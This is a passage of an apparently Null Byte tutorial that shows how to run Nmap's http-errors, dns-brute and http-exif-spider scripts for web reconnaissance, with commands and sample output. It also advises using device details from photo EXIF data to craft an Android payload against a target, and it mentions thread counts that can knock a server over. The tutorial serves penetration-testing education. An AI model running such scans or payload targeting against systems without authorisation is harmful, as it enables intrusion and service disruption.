below is a list of the five HTTP status code categories. Web application penetration testers should familiarize themselves with all of the status codes and their definitions.1xx(Informational): The request was received, continuing process2xx(Successful): The request was successfully received, understood, and accepted3xx(Redirection): Further action needs to be taken in order to complete the request4xx(Client Error): The request contains bad syntax or cannot be fulfilled5xx(Server Error): The server failed to fulfill an apparently valid requestThehttp-errorsNmap script can be used to identify interesting status codes for further investigation.nmap -p80,443 --script http-errors targetWebsite.comSimply calling thehttp-errorsscript is enough to get started. Ports 80 and 443 are command web server ports but can be changed to meet your needs.Nmap scan report for Host is up (0.67s latency). PORT STATE SERVICE 80/tcp open http | http-errors: | Spidering limited to: maxpagecount=40; | Found the following error pages: | | Error Code: 403 |_ 443/tcp open https | http-errors: | Spidering limited to: maxpagecount=40; | Found the following error pages: | | Error Code: 400 |_ the above output, Nmap detected a status 403, which suggests the servers file permissions are misconfigured and visitors don't have access to the requested resource. Below is a more refined command that includes several script arguments.nmap -vv -p80,443 --script http-errors --script-args "httpspider.url=/docs/,httpspider.maxpagecount=3,httpspider.maxdepth=1" targetwebsite.comThis particular Nmap script utilizes thehttpspiderlibrary, so we can use arguments likehttpspider.url,httpspider.maxpagecount, andhttpspider.maxdepthto refine our scan to specific URLs and define how many pages we want Nmap to crawl before stopping.4. Find Shared & New ServersSubdomains are often used to host additional websites for a specific subset of users. For example, Null Byte ( is one of many subdomains in the WonderHowTo network of websites. Popular subdomains,, subdomains are useful to hackers because the subdomain and main domain may actually be hosted on completely different virtual private servers, in different parts of the world, and may not exercise the same degree of security.Thedns-brutescript built into Nmap is designed to enumerate subdomains and their corresponding server IP addresses.nmap -p80,443 --script dns-brute Starting Nmap 7.70 ( ) Nmap scan report for Host is up (0.16s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Host script results: | dns-brute: | DNS Brute-force hostnames: | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - |_ - Nmap done: 1 IP address (1 host up) scanned in 32.62 secondsThis particular website has many subdomains configured and not all share the same IP address. At this point, a penetration tester can further expand their reconnaissance to the newly discovered servers under this websites control.Below is adns-brutecommand that features several--script-args.nmap -p80,443 --script dns-brute --script-args dns-brute.threads=25,dns-brute.hostlist=/root/Desktop/custom-subdomain-wordlist.txt Starting Nmap 7.70 ( ) Nmap scan report for Host is up (0.17s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Host script results: | dns-brute: | DNS Brute-force hostnames: | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - | - |_ - Nmap done: 1 IP address (1 host up) scanned in 62.15 secondsBy default, dns-brute will scan using five concurrent threads. We can increase or decrease this value with thedns-brute.threads. Depending on the type of web server, many threads will crash a server or act as a denial of service, making the website slow or unresponsive for other users. Adjust this value with caution.Dns-brute will attempt about 125 popular subdomains. We can usecustom subdomain listswith thedns-brute.hostlistargument. As we can see in the above output, using acomprehensive wordlist, we were able to detect more subdomains and IP addresses controlled by this website.Related Book: "Nmap 6: Network Exploration and Security Auditing Cookbook" by Paulino Calderon (Available fromAmazon|Walmart)5. Extract EXIF Data from PhotosExchangeable image file, known more as EXIF, is information stored in JPEG, PNG, PDF, and many more file types. This embedded data can sometimes reveal interesting information, including timestamps, device information, and GPS coordinates. Most websites still do not properly sanitize EXIF data from images, leaving themselves or their users at risk.As penetration testers, knowing what kind of device a target is using will aid us in determining what kind(s) of payloads to generate. A classic example ofEXIF data being used to catch a black hatis the arrest of Higinio Ochoa. FBI agents extrapolated his girlfriend's geographic location using the GPS data found in a photo Higinio uploaded to the internet.Nmap'shttp-exif-spiderscript can be used to extract interesting EXIF data from photos found on websites. Such a script isn't useful against mainstream sites like Instagram, Twitter, and Facebook. Major websites scrub EXIF data when users upload new photos. However, personal blogs, small businesses, and corporate organizations may not practice strong security precautions or monitor what employees are posting online. It's not uncommon to find GPS data in photos.nmap -p80,443 --script http-exif-spider Starting Nmap 7.70 ( ) Nmap scan report for Host is up (0.12s latency). PORT STATE SERVICE 80/tcp open http | http-exif-spider: | | Make: NIKON CORPORATION | Model: NIKON D4 | Date: 2017:04:26 21:22:49 | | Make: Samsung | Model: Galaxy S6 |_ Date: 2017:02:24 23:37:14 443/tcp open https | http-exif-spider: | | Make: Canon |_ Model: Canon EOS 5D Mark III Nmap done: 1 IP address (1 host up) scanned in 30.43 secondsWe can see the above target is using an Android phone and a variety of digital cameras. We can now (with some degree of certainty) generate an Android-specific payload and send it to the target to further compromise their devices, accounts, and networks.When attempting to extract EXIF data from large photos, Nmap may produce an error message that states "Current http cache size exceeds max size." This is Nmap telling us that the photo is too large and is exceeding the default maximum file size value. Use thehttp.max-cache-sizeargument and increase the value as needed. Below I've set it to an arbitrarily high number.nmap -p80,443 --script http-exif-spider --script-args="http.max-cache-size=99999999" targetWebsite.comMore Nmap Scripts to Come ...Whether we're enumerating subdomains, detecting WAF version info, or reporting broken webpages for a small bug bounty, Nmap scripts have us covered. And we've barely scratched the surface with what Nmap scripts are capable of. In my next article, I'll be talking about scripts that don't trigger web application firewalls or alert system administrators to our attempts at reconnaissance.Don't Miss:More Nmap Guides on Null ByteFollow Gadget Hacks onFacebook,Twitter,YouTube, andFlipboardSign up forGadget Hacks' daily newsletteror weeklyAndroidandiOSupdatesFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Justin Meyers/Null ByteRelatedHow To:Get Started Writing Your Own NSE Scripts for NmapHow To:Use NMAP 7 to Discover Vulnerabilities, Launch DoS Attacks and More!How To:Easily Detect CVEs with Nmap ScriptsHack Like a Pro:Using the Nmap Scripting Engine (NSE) for ReconnaissanceHow To:Tactical Nmap for Beginner Network ReconnaissanceHack Like a Pro:How to Scan the Internet for Heartbleed VulnerabilitiesHack Like a Pro:Scripting for the Aspiring Hacker, Part 2 (Conditional Statements)Hack Like a Pro:Advanced Nmap for ReconnaissanceHow To:Enumerate NetBIOS Shares with NBTScan & Nmap Scripting EngineHow To:Identify Web Application Firewalls with Wafw00f & NmapDissecting Nmap:Part 1How to Hack Databases:Hunting for Microsoft's SQL ServerHow To:Automate Brute-Force Attacks for Nmap ScansZanti:NmapHack Like a Pro:Scripting for the Aspiring Hacker, Part 1 (BASH Basics)Hack Like a Pro:Python Scripting for the Aspiring Hacker, Part 1Hack Like a Pro:How to Conduct Active Reconnaissance and DOS Attacks with NmapHow To:Do a Simple NMAP Scan on ArmatigeHow To:Use Magic Tree to Organize Your ProjectsHow To:Do an Idle Scan with NmapHow To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHow To:Perform Network-Based Attacks with an SBC ImplantHack Like a Pro:How to Perform Stealthy Reconnaissance on a Protected NetworkHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItHacking Reconnaissance:Finding Vulnerabilities in Your Target Using NmapHow To:Use the Nmap security tool
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